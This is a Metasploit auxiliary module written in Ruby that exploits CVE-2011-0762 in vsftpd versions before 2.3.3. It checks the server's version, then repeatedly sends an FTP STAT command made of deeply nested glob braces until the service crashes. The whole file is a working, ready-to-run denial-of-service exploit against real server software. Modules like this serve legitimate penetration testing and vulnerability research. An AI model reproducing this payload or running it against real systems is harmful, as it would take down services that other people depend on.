CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Ftp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name'	=> 'VSFTPD 2.3.2 Denial of Service',
15
        'Description'	=> %q{
16
          This module triggers a Denial of Service condition in the VSFTPD server in
17
          versions before 2.3.3. So far, it has been tested on 2.3.0, 2.3.1, and 2.3.2.
18
        },
19
        'Author' => [
20
          'Nick Cottrell (Rad10Logic) <ncottrellweb[at]gmail.com>', # Module Creator
21
          'Anna Graterol <annagraterol95[at]gmail.com>', # Vuln researcher
22
          'Mana Mostaani <mana.mostaani[at]gmail.com>',
23
          'Maksymilian Arciemowicz' # Original EDB PoC
24
        ],
25
        'License' => MSF_LICENSE,
26
        'References' => [
27
          [ 'BID', '46617' ],
28
          [ 'CVE', '2011-0762' ],
29
          [ 'EDB', '16270' ]
30
        ],
31
        'DisclosureDate' => '2011-02-03',
32
        'Notes' => {
33
          'Stability' => [CRASH_SERVICE_DOWN],
34
          'Reliability' => [REPEATABLE_SESSION],
35
          'SideEffects' => []
36
        }
37
      )
38
    )
39
  end
40

41
  def check
42
    # attempt to connect
43
    begin
44
      if !connect_login
45
        print_error('Connection refused.')
46
        return Exploit::CheckCode::Unknown
47
      end
48
    rescue Rex::ConnectionRefused
49
      print_error('Connection refused.')
50
      return Exploit::CheckCode::Unknown
51
    rescue Rex::ConnectionTimeout
52
      print_error('Connection timed out')
53
      return Exploit::CheckCode::Unknown
54
    end
55
    s = ''
56
    loop do
57
      # get each line until our desired line shows or end line shows
58
      s = send_cmd(['STAT'], true)
59
      break if (s =~ /vsFTPd \d+\.\d+\.\d+/) || (s == "211 End of status\r\n")
60
    end
61
    disconnect
62
    # check if version was found
63
    if s !~ /vsFTPd \d+\.\d+\.\d+/
64
      print_error('Did not find ftp version in FTP session.')
65
      return Exploit::CheckCode::Unknown
66
    end
67

68
    # pull out version and check if its in range of vulnerability
69
    version = s[/\d+\.\d+\.\d+/]
70
    if Rex::Version.new(version) < Rex::Version.new('2.3.3')
71
      Exploit::CheckCode::Appears
72
    else
73
      Exploit::CheckCode::Safe
74
    end
75
  end
76

77
  def run
78
    fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') if check != Exploit::CheckCode::Appears
79

80
    payload = 'STAT ' + '{{*},' * 487 + '{.}' + '}' * 487
81

82
    vprint_status("Payload being sent: #{payload}")
83
    print_status('sending payload')
84

85
    loop do
86
      print('.')
87
      connect_login
88
      10.times do
89
        send_cmd([payload.to_s], false)
90
      end
91
      send_cmd([payload.to_s], true)
92
      disconnect
93
    rescue Rex::ConnectionTimeout
94
      print("\n")
95
      print_error('Connection timeout! Sending again')
96
    rescue Errno::ECONNRESET
97
      print("\n")
98
      print_error('Connection reset!')
99
    rescue Rex::ConnectionRefused
100
      print("\n")
101
      print_good('Connection refused! Appears DOS attack succeeded.')
102
    rescue EOFError
103
      print("\n")
104
      print_good('Stream was cut off abruptly. Appears DOS attack succeeded.')
105
      break
106
    end
107
    disconnect
108
  end
109
end
110

111